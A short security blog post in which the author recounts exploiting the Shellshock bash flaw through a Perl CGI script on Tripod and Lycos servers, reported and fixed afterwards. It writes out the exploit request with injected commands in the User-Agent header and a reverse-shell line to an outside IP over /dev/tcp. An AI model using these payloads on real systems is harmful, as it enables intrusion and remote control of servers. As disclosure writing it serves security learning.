My ShellShockings

While I was suffering the interwebs my eyes caught a perl script which prints out the environment variables. For example something like this.
[code language=”perl”]
use CGI;

$cgi = new CGI;

for $key ( $cgi->param() ) {
$input{$key} = $cgi->param($key);
}

print qq{Content-type: text/html

<html><head></head><body>
};

foreach $key (sort (keys %ENV)) {
print $key, ‘ = ‘, $ENV{$key}, "<br>\n";
}

for $key ( keys %input ) {
print $key, ‘ = ‘, $input{$key}, "<br>\n";
}

print qq{<form METHOD=POST><input type="submit" value="Post Request">
<input name="postfield"></form>};
print qq{<form METHOD=GET ><input type="submit" value="Get Request ">
<input name="getfield" ></form>};

print qq{</body></html>};
[/code]
This would output the following.
[code language=”text”]
CONTEXT_DOCUMENT_ROOT : /var/chroot/home/
DOCUMENT_ROOT : /var/chroot/home/
GATEWAY_INTERFACE : CGI/1.1
GD_PHP_HANDLER : x-httpd-php5-3
HTTP_ACCEPT : text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
HTTP_ACCEPT_ENCODING : gzip, deflate, sdch
HTTP_ACCEPT_LANGUAGE : en-US,en;q=0.8
HTTP_CONNECTION : keep-alive
HTTP_USER_AGENT : Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
PATH : /usr/local/bin:/usr/bin:/bin
[/code]
It takes the “User-Agent:” field from the client. We can modify this to whatever input we like. So yeah it was vulnerable to the bash shellshock vulnerability. For example let’s inject “uname –a” and see the output.
[code language=”c”]
GET xxxx HTTP/1.1
Host: perlcgial.tripod.com
User-Agent: () { :;}; echo; /bin/bash –c “uname –a”
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
[/code]

View post on imgur.com

Let’s try () { :;}; echo; /bin/bash –c “/sbin/ifconfig”

View post on imgur.com

Since we are arbitrarily injecting code into the bash shell we can get a reverse connection like this.
User-Agent: () { :;}; echo; /bin/bash -i >& /dev/tcp/1.1.1.1/4444 0>&1

View post on imgur.com

That is it Game Over 🙂 This is how I owned lycos and tripod. As soon as I found this I reported them and they have already fixed this.
By the way koding.com was too affected by the Shellshock vulnerability.

View post on imgur.com

View post on imgur.com

After reporting them it was too successfully patched ?
Bonus: Tripod had a reflected XSS vulnerability too.

View post on imgur.com

I don’t know why it gives such a search result 😉